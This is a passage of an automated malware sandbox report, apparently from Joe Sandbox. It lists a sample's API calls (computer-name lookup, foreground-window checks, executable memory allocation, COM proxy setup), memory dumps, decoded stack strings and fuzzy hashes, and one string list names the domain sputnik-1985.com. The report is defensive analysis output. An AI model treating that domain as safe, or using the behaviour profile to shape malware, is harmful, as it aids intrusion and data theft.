• CoInitializeEx.OLE32(00000000,00000002), ref: 0040C8FA
• CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CA48
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
• Opcode ID: 010c4b1e04f494671fc6a4b3cc0d403b049cf30c780ab17d6453ff73d6dd8c41
• Instruction ID: d95c8ecd692f4bec92114f4d62421e6f35695d243453751eec6d32364b072da9
• Opcode Fuzzy Hash: 010c4b1e04f494671fc6a4b3cc0d403b049cf30c780ab17d6453ff73d6dd8c41
• Instruction Fuzzy Hash: D341A7B4D10B40AFD370EF399A0B7537EB8AB05250F504B1DF8EA866D4E631A4198BD7
APIs
• FreeLibrary.KERNEL32(?), ref: 0042AB88
• GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042AC39
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID: ComputerFreeLibraryName
• String ID:
• API String ID: 2904949787-0
APIs
• FreeLibrary.KERNEL32(?), ref: 0042AB88
• GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042AC39
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID: ComputerFreeLibraryName
• String ID:
• API String ID: 2904949787-0
APIs
• SetErrorMode.KERNELBASE(00000400,?,?,02470223,?,?), ref: 02470E19
• SetErrorMode.KERNELBASE(00000000,?,?,02470223,?,?), ref: 02470E1E
Memory Dump Source
• Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_filename.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
APIs
• GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042AC39
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID: ComputerName
• String ID:
• API String ID: 3545744682-0
APIs
• GetForegroundWindow.USER32 ref: 0043CE42
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID: ForegroundWindow
• String ID:
• API String ID: 2020703349-0
APIs
• RtlReAllocateHeap.NTDLL(?,00000000), ref: 0043CCB0
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID: BlanketProxy
• String ID:
• API String ID: 3890896728-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID: BlanketProxy
• String ID:
• API String ID: 3890896728-0
APIs
• RtlFreeHeap.NTDLL(?,00000000,?,0043CCC9), ref: 0043B191
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID: FreeHeap
• String ID:
                                                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                                                              • Opcode ID: 608cedfccbbf481f8e401043c18315b1c04c4d5b3f3da65999cdb297b3b7b5b2
                                                                                                                                                                                                              • Instruction ID: 3f498c724aab9959a3b29728e932f0d8bb988b949dec240799eec3c50057edb1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 608cedfccbbf481f8e401043c18315b1c04c4d5b3f3da65999cdb297b3b7b5b2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45D01235105122FBC6502B55BC017CB3754AF49311F1608B6E401560B1EA348C418E99
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CA96
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeSecurity
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 640775948-0
                                                                                                                                                                                                              • Opcode ID: 74c2f83be96e840124e7525c87e1fe0546c9548efc227c833e10c378a6e3cf8e
                                                                                                                                                                                                              • Instruction ID: 7c0d98bce72ca0fe3c5e96c7b3cbae874c361722319ecc0000526e4895fec6d3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 74c2f83be96e840124e7525c87e1fe0546c9548efc227c833e10c378a6e3cf8e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FD0C9343C43407AF1644758ED53F143260A782F11FB40228B326FE6D1C9E0B111861C
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0043CE42
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ForegroundWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2020703349-0
                                                                                                                                                                                                              • Opcode ID: 42811b8c73c6627804d48a2153b96f9cb1ea9daba6b0de4a15ad7b18b9359105
                                                                                                                                                                                                              • Instruction ID: 6a59fd0b47f8ad06e7618dab901bc5d0710017031ba22dab694b2b4113fdbacc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42811b8c73c6627804d48a2153b96f9cb1ea9daba6b0de4a15ad7b18b9359105
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0D017BD9003649FC604EF25EC4652533A4A74A2453900839EA03C33A3EA75A906CE0C
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,00000000), ref: 0043B141
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                              • Opcode ID: 4cc3f4b3a9d1bd60b995f4b524ac0e89f875f515073a93caf55134494d1bd910
                                                                                                                                                                                                              • Instruction ID: 5935400ee05eb42da44788acde9fab82ecb3a08923c60ef96b1e378cd26b7281
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4cc3f4b3a9d1bd60b995f4b524ac0e89f875f515073a93caf55134494d1bd910
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CEA01130080220AACA202B00BC08FCA3E20EB80222F0200A0B002080B282B08882CA88
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008DAEC6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532069127.00000000008DA000.00000040.00000020.00020000.00000000.sdmp, Offset: 008DA000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_8da000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                              • Instruction ID: 497d52174a86c93bab95a0a24f869c050156a04156c518347a338eaf3b351d99
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66115B79A00208EFCB01DF98C985E98BBF1EF08350F158095F9489B362D731EA90DB81
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: $!$"$"$#$%$'$)$)$*$*$+$-$/$0$1$2$2$3$4$5$6$7$7$9$9$:$;$<$<$=$=$?$@$@$A$C$E$G$H$I$I$J$K$K$M$M$O$Q$Q$Q$R$S$U$V$V$W$Y$[$[$]$]$_$a$b$c$e$f$g$i$jW}U$k$k$m$n$n$o$o$q$r$s$u$u$u$w$w$w$x$y$y$y${$}
                                                                                                                                                                                                              • API String ID: 0-2941195327
                                                                                                                                                                                                              • Opcode ID: e50b29eb7f514e7ece38cf6384aa5274311c420c84c51c49a0245f179b4fbd25
                                                                                                                                                                                                              • Instruction ID: eaefd49f985f01ef7c95af4a3561ecde55f798a405dde1ccb34c5ef52abd2b13
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e50b29eb7f514e7ece38cf6384aa5274311c420c84c51c49a0245f179b4fbd25
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A22543090C6E9CDEB26C628CC187DDBEA15B66314F0881D9C5DD6B3C2C7B94A85CB66
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: "$%$($)$*$+$,$,$-$0$5$6$:$<$>$@$A$B$D$F$I$L$P$R$T$T$U$V$X$Z$\$^$`$b$d$f$g$h$j$jW}U$l$n$p$r$t$v$w$x$z$|$~
                                                                                                                                                                                                              • API String ID: 0-350411598
                                                                                                                                                                                                              • Opcode ID: 3a296a68ecd6b985a7aa005b68eed387e975006c4e95b4c94706ec92968f1691
                                                                                                                                                                                                              • Instruction ID: 8502591322855d705f24ad365f97f36faf0cc2dcca370ab942e513f234bf859f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a296a68ecd6b985a7aa005b68eed387e975006c4e95b4c94706ec92968f1691
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52F1C621D087E98ADB26C67C88543CDBFB15B66314F0942DDC4E87B3D2C7B90A49CB66
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID: "$%$($)$*$+$,$,$-$0$5$6$:$<$>$@$A$B$D$F$I$L$P$R$T$T$U$V$X$Z$\$^$`$b$d$f$g$h$j$jW}U$l$n$p$r$t$v$w$x$z$|$~
                                                                                                                                                                                                              • API String ID: 2994545307-350411598
                                                                                                                                                                                                              • Opcode ID: 10994b25095715d3c07bd179171c8be1e146900c471e67b687a985a0d9b88cd9
                                                                                                                                                                                                              • Instruction ID: 3b2945c37613141cb0df42078c58c115b3d13bc74c53d7464d389b01b7946f0b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 10994b25095715d3c07bd179171c8be1e146900c471e67b687a985a0d9b88cd9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6F1E521D087E98ADB22C67C88443CDBFB15B56324F1942DDC4E87B3D2C7B90A49CB66
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,31B1BEFD,0000001E,00000000,00000000,31B1BEBB), ref: 004233E4
                                                                                                                                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,31B1BEFD,0000001E,00000000,?,31B1BEBB), ref: 00423461
Strings
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID: EnvironmentExpandStrings
• String ID: 'P#V$(\*b$*@2F$6Y$E0T6$E4A:$G:$I<JB$N$Y$Z,[2$ZY$^Q$_R$a"_\$a8\>$eC$g4a:$j8n>$n<l"$p$c*$s(q.$w(n.$y0{6$yv$T*$
• API String ID: 237503144-1431619414
• Opcode ID: efb8f8f0079cccf54d6554feda36f9e3b0062e8fc2309439d472f91ce72ac2b7
• Instruction ID: 78bca97211586e5d62953f3c3add26d81951743f6224714071837b6a2964b743
• Opcode Fuzzy Hash: efb8f8f0079cccf54d6554feda36f9e3b0062e8fc2309439d472f91ce72ac2b7
• Instruction Fuzzy Hash: A59273B560C3908BD334CF64D84179BBAE1FBC2304F44892DD5E9AB251D7B99906CB8B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID:
• String ID: 'P#V$(\*b$*@2F$6Y$E0T6$E4A:$G:$I<JB$N$Y$Z,[2$ZY$^Q$_R$a"_\$a8\>$eC$g4a:$j8n>$n<l"$p$c*$s(q.$w(n.$y0{6$yv$T*$
• API String ID: 0-1431619414
• Opcode ID: a03041a7daafffe8a9feedea5928b06e78d931e21610da2177377330fa5b30d5
• Instruction ID: 7d6b2742840b3886850745b9f25048588997c5f3f642c56be9e69fde27abc2c4
• Opcode Fuzzy Hash: a03041a7daafffe8a9feedea5928b06e78d931e21610da2177377330fa5b30d5
• Instruction Fuzzy Hash: 429285B560C3908BD330CF64D84179BBAE1FBC2304F44892DD6E9AB252D7799546CB8B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_filename.jbxd
Yara matches
Similarity
• API ID:
• String ID: 'P#V$(\*b$*@2F$6Y$E0T6$E4A:$G:$I<JB$N$Y$Z,[2$ZY$^Q$_R$a8\>$eC$g4a:$j8n>$n<l"$p$c*$s(q.$w(n.$y0{6$yv$T*
• API String ID: 0-3512105184
• Opcode ID: a3aa50b617ac8817bd1ab878953f6fc51667aa84756db8149849b51cc108a9aa
• Instruction ID: 192ee2e373a44b44539c6518fa321acf02ea27070fb821bacbab38c7cc12ab8c
• Opcode Fuzzy Hash: a3aa50b617ac8817bd1ab878953f6fc51667aa84756db8149849b51cc108a9aa
• Instruction Fuzzy Hash: FA32EAB160C7C58AD330CF54C541BDFBAF1EB82304F40882C86E96B656D676564ACB9B
APIs
• CoCreateInstance.COMBASE(0044268C,00000000,00000001,0044267C,00000000), ref: 024A7F04
• SysAllocString.OLEAUT32(07B905B6), ref: 024A7F6C
• CoSetProxyBlanket.COMBASE(CAF053BA,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 024A7FAA
• SysAllocString.OLEAUT32(A81AAA16), ref: 024A8012
• SysAllocString.OLEAUT32(0ECC08BC), ref: 024A810F
• VariantInit.OLEAUT32(A5A4ABB2), ref: 024A817D
• SysFreeString.OLEAUT32(00000000), ref: 024A8460
Strings
Memory Dump Source
• Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_filename.jbxd
Yara matches
Similarity
• API ID: String$Alloc$BlanketCreateFreeInitInstanceProxyVariant
• String ID: $cB$0NuNup=Nu$C$\L$\L$nohi$v=$y>$}qrs
• API String ID: 2895375541-2634092947
• Opcode ID: c2609f97893d2c1803f8fe5fde3c74f9cabcd6b7b6990df772e235fedc787c8d
• Instruction ID: ccb38b1a92cd8d9f48630331d34284e8718efb80350a1332817db4041764fed1
• Opcode Fuzzy Hash: c2609f97893d2c1803f8fe5fde3c74f9cabcd6b7b6990df772e235fedc787c8d
• Instruction Fuzzy Hash: DD321171A083508FE714CF64C8A07ABBBE1EF95314F14892EEAD58B381D775D806CB92
Strings
Memory Dump Source
• Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_filename.jbxd
Yara matches
Similarity
• API ID:
• String ID: &$)$*$,$,$/$4$4$5$5$6$6$:$=$>$@$J$P$ua9j
• API String ID: 0-52748966
• Opcode ID: c1e762d3af48749b96d384b74f206a085b68a3de8af0c071b0083f8698e44e81
• Instruction ID: 356a5517de310472335e24858c34c347144c8a68cc0596da2c2f2d652a5d276d
• Opcode Fuzzy Hash: c1e762d3af48749b96d384b74f206a085b68a3de8af0c071b0083f8698e44e81
• Instruction Fuzzy Hash: C7A1F823A0C7914AE311857D8C5435FEED20BE2264F1ECA7ED8E5873C6D5A9C94AC393
Strings
Memory Dump Source
• Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_filename.jbxd
Yara matches
Similarity
• API ID:
• String ID: +$0$0$S$X$Z$[$l$n$r$~
• API String ID: 0-3752990600
• Opcode ID: a34576c093be05ac0c5038eb556ea7266ae23b8e72f449edc15b644e9a618b67
• Instruction ID: 89696e8b1df711bce4293e0dc9d60f4fb63a3453fc4308d71a1f06be18933059
• Opcode Fuzzy Hash: a34576c093be05ac0c5038eb556ea7266ae23b8e72f449edc15b644e9a618b67
• Instruction Fuzzy Hash: D362C37161C7908BC724AB78C4943AFBBD2ABC5324F098A2FD8ED973C1D6798545CB42
Strings
Memory Dump Source
• Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_filename.jbxd
Yara matches
Similarity
• API ID:
• String ID: !@$,$@$C$F$H$I$L$N$O$jW}U$jW}U$jW}U$jW}U$jW}U$jW}U
• API String ID: 0-2791824542
• Opcode ID: 9db8843992b55c1cb17a7b9b827edafdb53de372284d731034b217df3a49e305
• Instruction ID: 1b1b0b36d559144b4931deae945ee9abbec430671ec061805758db7d4fa491ef
• Opcode Fuzzy Hash: 9db8843992b55c1cb17a7b9b827edafdb53de372284d731034b217df3a49e305
• Instruction Fuzzy Hash: 0732C57290C7918FD7248E38885436FBFE1AB85324F198A2EE5E9873D1D7798845CB42
Strings
Memory Dump Source
• Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_filename.jbxd
Yara matches
Similarity
• API ID:
• String ID: "$5$9$Z$Z$[$r$w$x$}
• API String ID: 0-3241252022
• Opcode ID: 3fe2c774c9f1f06418935f3364d584b81c27fc3cd392a2a600b0582d6ed36642
• Instruction ID: 8a3a6366f8f3fff610fd014e39e07477d9640f0dd059e85a9a0ac5321bc6e3cf
• Opcode Fuzzy Hash: 3fe2c774c9f1f06418935f3364d584b81c27fc3cd392a2a600b0582d6ed36642
• Instruction Fuzzy Hash: 3022837251D7908BC324EB38C4847AEBBE2ABC5314F194A2ED9ED87391D7748446CB53
Strings
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID:
• String ID: $%$8(0<$9><0$TU$eg$jZ$C\]$IK$MO$ga$R
• API String ID: 0-846545573
• Opcode ID: 8bb2329f87a14f332c6d7330e9e6ada747ffc48b48baef7dbaae7e351b90fae3
• Instruction ID: 5d3eedd99ac0e596199279912e75a3a133570a47c7de0e85472f7a0d7e0bc302
• Opcode Fuzzy Hash: 8bb2329f87a14f332c6d7330e9e6ada747ffc48b48baef7dbaae7e351b90fae3
• Instruction Fuzzy Hash: F37259B1A183508BDB14CF24C8516ABB7F2FF86314F18852DE8958B391E739D946CB86
Strings
Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: #J'$%$'=:($7$.&$E?+=$YG$sputnik-1985.com$~$~q$z
                                                                                                                                                                                                              • API String ID: 0-1358222418
                                                                                                                                                                                                              • Opcode ID: 702a59d302c1116530107147cee97d891d9c03a5c2659a9b5a4b7e24383d73eb
                                                                                                                                                                                                              • Instruction ID: 72a68aaddfe182c622747af4288669b9f700dff121d49939d8e9bc5c662bf3ee
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 702a59d302c1116530107147cee97d891d9c03a5c2659a9b5a4b7e24383d73eb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8EA1EFB050C3918FD325CF69949036BBFE1AFD2604F284A5DE4D28B361D3B5890ACB57
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: -$3Sp;$S$cX?v$ndn-$q?Ga$srb~$uG[E$vfdk$|nzc
                                                                                                                                                                                                              • API String ID: 0-4152154003
                                                                                                                                                                                                              • Opcode ID: 9ac01069b87c025cb18cc27a78bcdb824729ac9b8eef9131abfd8a598ccf0bd0
                                                                                                                                                                                                              • Instruction ID: 87c343c2430f097c8ddb1d33237bb21fcc29c40b4bade4b1daddee129ee65387
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ac01069b87c025cb18cc27a78bcdb824729ac9b8eef9131abfd8a598ccf0bd0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B61B17110C3D28ADB058F2984907BBFFE19F92248F1889AED4E59B343D729C50AC726
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: -$3Sp;$S$cX?v$ndn-$q?Ga$srb~$uG[E$vfdk$|nzc
                                                                                                                                                                                                              • API String ID: 0-4152154003
                                                                                                                                                                                                              • Opcode ID: 9ac01069b87c025cb18cc27a78bcdb824729ac9b8eef9131abfd8a598ccf0bd0
                                                                                                                                                                                                              • Instruction ID: d02e934ccce5eb6237b81fefe714ca6ff9b52d16efa86c836b1a3e521c3a79f5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ac01069b87c025cb18cc27a78bcdb824729ac9b8eef9131abfd8a598ccf0bd0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B61C46010C3929ADB058F29845077BFFE19FD7344F1889AED4D59B383D739890ACB6A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: `
                                                                                                                                                                                                              • API String ID: 0-2679148245
                                                                                                                                                                                                              • Opcode ID: ee10a088d06f2acfdc41d533f72017f8aeb69c1c695b7cc37e5ce4789daf93ef
                                                                                                                                                                                                              • Instruction ID: 3c4046a0b9695bfb11afeadce751921083c36bf3b0763603f2dd4dd0065a1b69
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee10a088d06f2acfdc41d533f72017f8aeb69c1c695b7cc37e5ce4789daf93ef
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D334871A087808FD714CF38C94539EBFF1AB56320F1982ADD4A99B3D2D7388985CB56
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
